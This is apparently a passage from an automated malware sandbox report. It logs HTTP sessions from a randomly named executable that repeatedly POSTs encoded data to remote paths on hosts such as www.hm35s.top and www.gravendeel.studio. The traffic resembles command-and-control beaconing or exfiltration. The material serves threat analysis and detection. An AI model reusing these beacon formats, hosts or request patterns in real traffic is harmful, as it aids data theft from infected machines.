                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Dec 3, 2024 14:40:33.049078941 CET1236INHTTP/1.1 200 OK
                                                                                                                            Date: Tue, 03 Dec 2024 13:40:32 GMT
                                                                                                                            Server: Apache
                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                            Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                            Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                            Set-Cookie: vsid=903vr48077883247977615; expires=Sun, 02-Dec-2029 13:40:32 GMT; Max-Age=157680000; path=/; domain=www.614genetics.online; HttpOnly
                                                                                                                            X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_kpEFkNp23E74GV2krikBfica5Qn2/WZkmn15IoDU7N69hPp2dt5Vpn09YJQiZy+VimEp8sfCCsOHsa/HN5pDbg==
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 62 61 31 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74
                                                                                                                            Data Ascii: ba10<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net
                                                                                                                            Dec 3, 2024 14:40:33.049181938 CET1236INData Raw: 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69 6e
                                                                                                                            Data Ascii: "> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in
                                                                                                                            Dec 3, 2024 14:40:33.049192905 CET1236INData Raw: 69 6f 6e 28 6a 29 7b 69 66 28 74 79 70 65 6f 66 28 6a 29 21 3d 22 62 6f 6f 6c 65 61 6e 22 29 7b 6a 3d 74 72 75 65 7d 69 66 28 6a 26 26 74 79 70 65 6f 66 28 63 6d 70 5f 67 65 74 6c 61 6e 67 2e 75 73 65 64 6c 61 6e 67 29 3d 3d 22 73 74 72 69 6e 67
                                                                                                                            Data Ascii: ion(j){if(typeof(j)!="boolean"){j=true}if(j&&typeof(cmp_getlang.usedlang)=="string"&&cmp_getlang.usedlang!==""){return cmp_getlang.usedlang}var g=window.cmp_getsupportedLangs();var c=[];var f=location.hash;var e=location.search;var a="language
                                                                                                                            Dec 3, 2024 14:40:33.049406052 CET1236INData Raw: 75 61 67 65 73 22 20 69 6e 20 68 29 7b 66 6f 72 28 76 61 72 20 71 3d 30 3b 71 3c 68 2e 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e 67 75 61 67 65 73 2e 6c 65 6e 67 74 68 3b 71 2b 2b 29 7b 69 66 28 68 2e 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e 67 75 61
                                                                                                                            Data Ascii: uages" in h){for(var q=0;q<h.cmp_customlanguages.length;q++){if(h.cmp_customlanguages[q].l.toUpperCase()==o.toUpperCase()){o="en";break}}}b="_"+o}function x(i,e){var w="";i+="=";var s=i.length;var d=location;if(d.hash.indexOf(i)!=-1){w=d.hash.
                                                                                                                            Dec 3, 2024 14:40:33.049417019 CET1236INData Raw: 68 2e 63 6d 70 5f 70 61 72 61 6d 73 3a 22 22 29 2b 28 75 2e 63 6f 6f 6b 69 65 2e 6c 65 6e 67 74 68 3e 30 3f 22 26 5f 5f 63 6d 70 66 63 63 3d 31 22 3a 22 22 29 2b 22 26 6c 3d 22 2b 6f 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2b 22 26 6f 3d 22 2b
                                                                                                                            Data Ascii: h.cmp_params:"")+(u.cookie.length>0?"&__cmpfcc=1":"")+"&l="+o.toLowerCase()+"&o="+(new Date()).getTime();j.type="text/javascript";j.async=true;if(u.currentScript&&u.currentScript.parentElement){u.currentScript.parentElement.appendChild(j)}else
                                                                                                                            Dec 3, 2024 14:40:33.049722910 CET694INData Raw: 5d 29 7b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 29 7b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 66 72 61 6d 65 22 29 3b 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 3d 22 64 69 73 70 6c
                                                                                                                            Data Ascii: ]){if(document.body){var a=document.createElement("iframe");a.style.cssText="display:none";if("cmp_cdn" in window&&"cmp_ultrablocking" in window&&window.cmp_ultrablocking>0){a.src="//"+window.cmp_cdn+"/delivery/empty.html"}a.name=b;a.setAttrib
                                                                                                                            Dec 3, 2024 14:40:33.093997955 CET1236INData Raw: 63 3d 62 2e 73 75 62 73 74 72 28 62 2e 69 6e 64 65 78 4f 66 28 22 3d 22 29 2b 31 2c 62 2e 6c 65 6e 67 74 68 29 7d 69 66 28 68 3d 3d 67 29 7b 66 3d 63 7d 76 61 72 20 65 3d 62 2e 69 6e 64 65 78 4f 66 28 22 3b 22 29 2b 31 3b 69 66 28 65 3d 3d 30 29
                                                                                                                            Data Ascii: c=b.substr(b.indexOf("=")+1,b.length)}if(h==g){f=c}var e=b.indexOf(";")+1;if(e==0){e=b.length}b=b.substring(e,b.length)}return(f)};window.cmp_stub=function(){var a=arguments;__cmp.a=__cmp.a||[];if(!a.length){return __cmp.a}else{if(a[0]==="ping
                                                                                                                            Dec 3, 2024 14:40:33.094085932 CET1236INData Raw: 70 70 2e 6c 61 73 74 49 64 3b 5f 5f 67 70 70 2e 65 2e 70 75 73 68 28 7b 69 64 3a 63 2c 63 61 6c 6c 62 61 63 6b 3a 66 7d 29 3b 72 65 74 75 72 6e 7b 65 76 65 6e 74 4e 61 6d 65 3a 22 6c 69 73 74 65 6e 65 72 52 65 67 69 73 74 65 72 65 64 22 2c 6c 69
                                                                                                                            Data Ascii: pp.lastId;__gpp.e.push({id:c,callback:f});return{eventName:"listenerRegistered",listenerId:c,data:true,pingData:window.cmp_gpp_ping()}}else{if(g==="removeEventListener"){var h=false;__gpp.e=__gpp.e||[];for(var d=0;d<__gpp.e.length;d++){if(__gp
                                                                                                                            Dec 3, 2024 14:40:33.094099998 CET1236INData Raw: 28 74 79 70 65 6f 66 28 63 29 3d 3d 3d 22 6f 62 6a 65 63 74 22 26 26 63 21 3d 3d 6e 75 6c 6c 26 26 22 5f 5f 74 63 66 61 70 69 43 61 6c 6c 22 20 69 6e 20 63 29 7b 76 61 72 20 62 3d 63 2e 5f 5f 74 63 66 61 70 69 43 61 6c 6c 3b 77 69 6e 64 6f 77 2e
                                                                                                                            Data Ascii: (typeof(c)==="object"&&c!==null&&"__tcfapiCall" in c){var b=c.__tcfapiCall;window.__tcfapi(b.command,b.version,function(h,g){var e={__tcfapiReturn:{returnValue:h,success:g,callId:b.callId}};d.source.postMessage(a?JSON.stringify(e):e,"*")},b.pa
                                                                                                                            Dec 3, 2024 14:40:33.094321012 CET1236INData Raw: 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 61 64 64 46 72 61 6d 65 28 22 5f 5f 75 73 70 61 70 69 4c 6f 63 61 74 6f 72 22 29 7d 69 66 28 21 28 22 63 6d 70 5f 64 69 73 61 62 6c 65 74 63 66 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 21 77 69 6e 64 6f 77 2e
                                                                                                                            Data Ascii: {window.cmp_addFrame("__uspapiLocator")}if(!("cmp_disabletcf" in window)||!window.cmp_disabletcf){window.cmp_addFrame("__tcfapiLocator")}if(!("cmp_disablegpp" in window)||!window.cmp_disablegpp){window.cmp_addFrame("__gppLocator")}window.cmp_s
                                                                                                                            Dec 3, 2024 14:40:33.169816017 CET1236INData Raw: 65 66 69 6e 65 64 22 20 26 26 20 61 62 70 65 72 75 72 6c 21 3d 22 22 29 77 69 6e 64 6f 77 2e 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 3d 61 62 70 65 72 75 72 6c 3b 7d 63 61 74 63 68 28 65 72 72 29 7b 7d 7d 3c 2f 73 63 72 69 70 74 3e 3c 6d 65 74 61 20
                                                                                                                            Data Ascii: efined" && abperurl!="")window.top.location=abperurl;}catch(err){}}</script><meta name="tids" content="a='29620' b='33565' c='614genetics.online' d='entity_mapped'" /><title>614genetics.online</title><meta http-equiv="Content-Type" content="


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            29192.168.2.650043154.23.184.95805868C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 3, 2024 14:40:39.150326014 CET794OUTPOST /tb3j/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.hm35s.top
                                                                                                                            Content-Length: 213
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.hm35s.top
                                                                                                                            Referer: http://www.hm35s.top/tb3j/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Raw: 75 36 6e 50 5f 46 34 38 3d 48 51 76 6c 47 53 67 58 42 57 33 76 58 37 4e 31 38 71 54 71 55 30 4d 58 54 69 2f 4c 78 77 46 4e 50 4a 73 34 7a 4a 52 4f 50 4f 79 6c 48 69 42 4d 59 76 45 6b 55 68 50 4b 72 4f 58 6c 76 50 54 74 51 79 4b 68 58 58 39 59 30 76 51 57 72 32 63 47 56 48 46 73 6b 47 36 6c 56 70 77 31 74 2b 73 75 61 6a 75 55 41 71 35 64 64 6f 4c 38 4c 7a 35 68 31 72 4a 36 38 65 59 67 52 4d 44 54 56 58 71 61 2b 41 76 50 54 6b 33 38 77 6f 70 33 6d 4c 56 4a 33 49 76 53 43 69 51 76 44 62 31 51 72 33 35 45 64 67 47 68 67 31 4a 68 61 44 35 44 51 48 2b 6f 45 79 65 76 69 69 45 79 74 33 70 58 70 76 37 79 65 51 6f 30 56 37 6b 65 66 6d 31 69
                                                                                                                            Data Ascii: u6nP_F48=HQvlGSgXBW3vX7N18qTqU0MXTi/LxwFNPJs4zJROPOylHiBMYvEkUhPKrOXlvPTtQyKhXX9Y0vQWr2cGVHFskG6lVpw1t+suajuUAq5ddoL8Lz5h1rJ68eYgRMDTVXqa+AvPTk38wop3mLVJ3IvSCiQvDb1Qr35EdgGhg1JhaD5DQH+oEyeviiEyt3pXpv7yeQo0V7kefm1i


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            30192.168.2.650044154.23.184.95805868C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 3, 2024 14:40:41.813071012 CET818OUTPOST /tb3j/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.hm35s.top
                                                                                                                            Content-Length: 237
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.hm35s.top
                                                                                                                            Referer: http://www.hm35s.top/tb3j/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Raw: 75 36 6e 50 5f 46 34 38 3d 48 51 76 6c 47 53 67 58 42 57 33 76 57 66 4a 31 39 4a 4c 71 52 55 4d 55 66 43 2f 4c 6a 77 46 33 50 4a 6f 34 7a 4c 38 56 4f 37 71 6c 45 43 52 4d 5a 72 59 6b 54 68 50 4b 7a 65 58 73 69 76 53 41 51 79 58 63 58 57 78 59 30 76 45 57 72 7a 77 47 56 30 64 76 6d 57 36 6e 4e 5a 77 7a 67 65 73 75 61 6a 75 55 41 73 55 49 64 73 6e 38 49 48 39 68 31 4b 4a 31 2f 65 59 76 53 4d 44 54 66 48 71 65 2b 41 76 74 54 6d 43 58 77 71 52 33 6d 4b 6c 4a 33 63 37 4e 56 53 52 71 65 4c 31 41 76 46 59 42 53 54 44 43 67 30 78 2b 46 6a 78 53 63 52 6a 79 59 42 65 4d 77 79 6b 77 74 31 78 6c 70 50 37 59 63 51 51 30 48 73 6f 35 51 53 51 42 4a 78 4b 64 57 78 47 6e 50 6a 76 62 44 58 64 4a 4c 77 67 6d 30 77 3d 3d
                                                                                                                            Data Ascii: u6nP_F48=HQvlGSgXBW3vWfJ19JLqRUMUfC/LjwF3PJo4zL8VO7qlECRMZrYkThPKzeXsivSAQyXcXWxY0vEWrzwGV0dvmW6nNZwzgesuajuUAsUIdsn8IH9h1KJ1/eYvSMDTfHqe+AvtTmCXwqR3mKlJ3c7NVSRqeL1AvFYBSTDCg0x+FjxScRjyYBeMwykwt1xlpP7YcQQ0Hso5QSQBJxKdWxGnPjvbDXdJLwgm0w==
                                                                                                                            Dec 3, 2024 14:40:43.420348883 CET312INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx
                                                                                                                            Date: Tue, 03 Dec 2024 13:40:43 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 148
                                                                                                                            Connection: close
                                                                                                                            ETag: "66a5f968-94"
                                                                                                                            Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            31192.168.2.650045154.23.184.95805868C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 3, 2024 14:40:44.484373093 CET1831OUTPOST /tb3j/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.hm35s.top
                                                                                                                            Content-Length: 1249
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.hm35s.top
                                                                                                                            Referer: http://www.hm35s.top/tb3j/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Raw: 75 36 6e 50 5f 46 34 38 3d 48 51 76 6c 47 53 67 58 42 57 33 76 57 66 4a 31 39 4a 4c 71 52 55 4d 55 66 43 2f 4c 6a 77 46 33 50 4a 6f 34 7a 4c 38 56 4f 37 69 6c 45 77 70 4d 59 4d 73 6b 53 68 50 4b 2f 2b 58 70 69 76 53 34 51 79 66 51 58 57 73 6c 30 74 38 57 36 6c 6b 47 46 42 78 76 76 57 36 6e 52 70 77 79 74 2b 73 37 61 6a 2b 59 41 73 6b 49 64 73 6e 38 49 47 4e 68 7a 62 4a 31 7a 2b 59 67 52 4d 44 66 56 58 71 79 2b 41 6e 58 54 6d 48 73 77 2b 74 33 6d 71 31 4a 37 4a 76 4e 4a 43 52 6f 64 4c 30 66 76 46 55 4b 53 51 33 6b 67 30 56 45 46 6b 42 53 66 32 61 47 47 54 57 4c 7a 42 34 64 38 33 39 42 68 66 76 4e 45 7a 45 53 50 65 6f 61 59 54 73 35 4f 47 32 71 65 58 4c 36 45 56 50 71 4c 48 38 6a 47 79 35 36 6b 2b 61 30 30 74 79 79 2f 6d 6b 44 39 49 46 75 33 4f 73 57 73 30 2f 5a 59 57 77 30 51 62 6c 41 59 78 42 43 53 75 70 61 54 46 63 37 4e 57 4f 4b 44 36 39 70 6b 79 4e 34 47 69 44 55 49 42 6c 34 49 49 4c 74 42 38 37 73 65 41 63 4e 59 31 66 67 4a 62 49 62 43 33 46 6d 50 4f 41 38 37 54 54 32 79 74 45 4f 48 4f 50 4b 78 [TRUNCATED]
                                                                                                                            Data Ascii: u6nP_F48=HQvlGSgXBW3vWfJ19JLqRUMUfC/LjwF3PJo4zL8VO7ilEwpMYMskShPK/+XpivS4QyfQXWsl0t8W6lkGFBxvvW6nRpwyt+s7aj+YAskIdsn8IGNhzbJ1z+YgRMDfVXqy+AnXTmHsw+t3mq1J7JvNJCRodL0fvFUKSQ3kg0VEFkBSf2aGGTWLzB4d839BhfvNEzESPeoaYTs5OG2qeXL6EVPqLH8jGy56k+a00tyy/mkD9IFu3OsWs0/ZYWw0QblAYxBCSupaTFc7NWOKD69pkyN4GiDUIBl4IILtB87seAcNY1fgJbIbC3FmPOA87TT2ytEOHOPKxBZqUV5XcWM2NDia+v6ElahkAwGRcRGwItl4GA3NdPNFJaZTJfZY9KHhhEr0XA1zpl47Ty0Cw+VjUKLsvwjkWKnL8dgJCa80yzB9UT/tjdn7pWW6zY9h9ZNh4pIN+IFNbAab9NmpUCle7swQB3HYMVbjzltE9toKR9VpREYOd2n0Egk6+erZD3aQzwYqV3toPG7iWgvKHTS71q7ur1jIqC5mkkmknR6uAngEIS1eA3S4bLS1xOwZU1stfReo4eNkiVwi/ZQdwrPnhLvfgjibWHPBmv6DrGMWYYMRzdui03pkLW+DMpVA5d2uekD7iGWvLhDsEPcmtaqkI/HVw2ciTcwfDBUUdfw4SAQXWWEcRAACclcu+KZlkoZAlkFIvrLNRF2wLzOc70iKMbXXo1DUlCeBAxHT6rP1uYgSeJyDvxNADr6cuYsUkyscZfqbgOh3//xcqpKt41OThzPzhSAafttQCMJB5MwvpnU2UeVRrb5ZyXQbHJGs2wSf/FXkfuAQB4LhJA/GdK4YnCG9p85NPoyJ5gCCZGZRaMNoaWay1gUkYWCqJqQXYdicEos4XFxIa7+K+nrwD6FtEYyAR+GizehO8aphY3MhVf7PdJrd2FbRyg/XmpIkk42DAGalyndWYUhVOnDKnJvRvXuWtChAvRIkcU4jYv+hdBo [TRUNCATED]
                                                                                                                            Dec 3, 2024 14:40:46.073420048 CET312INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx
                                                                                                                            Date: Tue, 03 Dec 2024 13:40:45 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 148
                                                                                                                            Connection: close
                                                                                                                            ETag: "66a5f968-94"
                                                                                                                            Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            32192.168.2.650046154.23.184.95805868C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 3, 2024 14:40:47.154345989 CET549OUTGET /tb3j/?F8S0G=ul80rPhxFlR8lH&u6nP_F48=KSHFFnYTGWj/ZMhm+avBOUk2TTzM3y8YS8Rf4LhuEMPHAxZPTsF4EjHc/8b3mL3nQQOBHU115ds5/08vb05btA7AesMNksIJY0axPJ9FedzLP3Na7bRMzIAWWfH5e2OB5R7SOhY= HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.hm35s.top
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Dec 3, 2024 14:40:48.765579939 CET312INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx
                                                                                                                            Date: Tue, 03 Dec 2024 13:40:48 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 148
                                                                                                                            Connection: close
                                                                                                                            ETag: "66a5f968-94"
                                                                                                                            Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            33192.168.2.650047172.104.18.233805868C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 3, 2024 14:40:54.605845928 CET818OUTPOST /7hhj/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.gravendeel.studio
                                                                                                                            Content-Length: 213
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.gravendeel.studio
                                                                                                                            Referer: http://www.gravendeel.studio/7hhj/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Raw: 75 36 6e 50 5f 46 34 38 3d 51 32 71 45 73 66 54 54 32 37 6e 42 43 4b 42 6e 49 66 7a 53 59 61 39 4a 56 56 63 71 4e 62 61 76 4e 2b 76 2b 41 5a 30 38 6a 57 78 4a 72 4d 42 48 62 4d 5a 71 4f 56 4f 6c 6b 65 61 45 75 6e 4d 76 62 48 64 44 63 6f 6e 62 61 48 69 54 43 53 42 4b 30 72 43 46 65 4f 73 48 34 69 68 57 62 78 50 6c 35 33 37 44 34 74 4e 72 4c 56 6f 38 7a 6f 6b 57 31 44 39 47 66 32 2b 58 70 4e 67 77 7a 79 65 43 72 2b 42 53 61 66 7a 4e 72 45 43 71 6a 33 6d 44 32 73 63 70 2f 52 46 66 64 65 62 74 64 51 49 61 5a 7a 6a 42 74 70 52 50 38 4b 43 61 32 6b 77 44 4e 65 6a 2f 79 6a 45 43 72 4a 58 61 58 47 6d 63 6e 56 37 75 2f 54 4c 48 46 34 74 65
                                                                                                                            Data Ascii: u6nP_F48=Q2qEsfTT27nBCKBnIfzSYa9JVVcqNbavN+v+AZ08jWxJrMBHbMZqOVOlkeaEunMvbHdDconbaHiTCSBK0rCFeOsH4ihWbxPl537D4tNrLVo8zokW1D9Gf2+XpNgwzyeCr+BSafzNrECqj3mD2scp/RFfdebtdQIaZzjBtpRP8KCa2kwDNej/yjECrJXaXGmcnV7u/TLHF4te
                                                                                                                            Dec 3, 2024 14:40:55.729502916 CET416INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx
                                                                                                                            Date: Tue, 03 Dec 2024 13:40:55 GMT
                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Content-Encoding: br
                                                                                                                            Data Raw: 62 65 0d 0a a1 d0 09 00 20 06 ad ab 6f 49 73 1d 8c 90 23 de 5c 6f 21 77 77 36 48 26 d1 6c 4a f0 f2 bd 09 4d 88 22 4d a6 a7 3e 17 0c eb b2 4b 9a 7e 14 ca c9 ed 66 2c 5c 14 4c 50 b4 56 12 da 58 d4 d8 43 b7 f1 38 51 86 60 3d 8b 2c cf 71 6e 26 79 b0 bf ce 27 6d 5d 04 f3 3d 64 5e 46 76 7d 41 c3 3c a3 16 13 c8 19 67 85 3f 71 dd 09 9a df 73 27 68 44 b9 69 8d ae 43 40 4d 59 af b0 d5 42 be d3 13 97 eb 0b 6d 47 fc f5 01 ed 35 56 e1 6e a1 0c 74 d7 d3 9f c6 84 22 3c e9 1d 92 e5 f5 65 b0 75 bd c2 b3 b1 37 31 e2 fd 5c 63 ba c0 0d 30 58 56 36 8d 2b ae ff 11 ab c3 a3 05 ca de a4 70 43 70 04 0d 0a 30 0d 0a 0d 0a
